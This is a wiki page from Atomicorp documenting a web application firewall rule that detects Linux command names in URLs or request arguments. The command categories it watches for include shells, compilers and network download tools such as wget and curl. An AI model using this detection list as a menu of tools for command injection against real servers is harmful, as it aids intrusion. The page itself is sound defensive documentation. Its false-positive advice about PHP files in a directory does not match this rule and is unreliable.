WAF 340029

From Atomicorp Wiki
Revision as of 15:38, 12 December 2013 by Mshinn (Talk | contribs)

Jump to: navigation, search
Rule 340029
Status Active
Alert Message Atomicorp.com WAF Rules: Possible command in REQUEST_URI or Argument

Contents

Description

This rule detects when a Linux command is used in a URL or an argument. It specifically looks for these types of commands:

  • process management tools (kill, nice, etc.)
  • file management tools (cp, chown, rm, etc.)
  • shells (bash, tcsh, etc.)
  • compilers (gcc, c++, etc.)
  • web downloading tools (wget, curl, etc.)
  • interpreters (perl, php, etc.)
  • other downloading tools (scp, ftp, etc.)


Some attack tools are known to blindly look for software tools and to see if it can use them. Therefore, the fact that this rule is triggered does not mean that the software tool is installed on the system.

If your system is being targeted with these kinds of attacks we do not recommend you disable this rule. This rule may be telling you that someone is attacking your system, and therefore you should block this source. Please see the blog post referenced below for information about leaving rules enabled for applications you may not have installed.

Troubleshooting

False Positives

If your CMS is known to use this directory for PHP files, and is known to securely prevent users from uploading PHP files to this directory then this may be a false positive. Please check with your web application vendor to determine if this is true.

Tuning Guidance

If you want to disable this rule, please see the Tuning the Atomicorp WAF Rules page for basic information.

Additional Information

Blog Articles

None.

Similar Rules

None.

Knowledge Base Articles

None.

Outside References

None.

Notes

Personal tools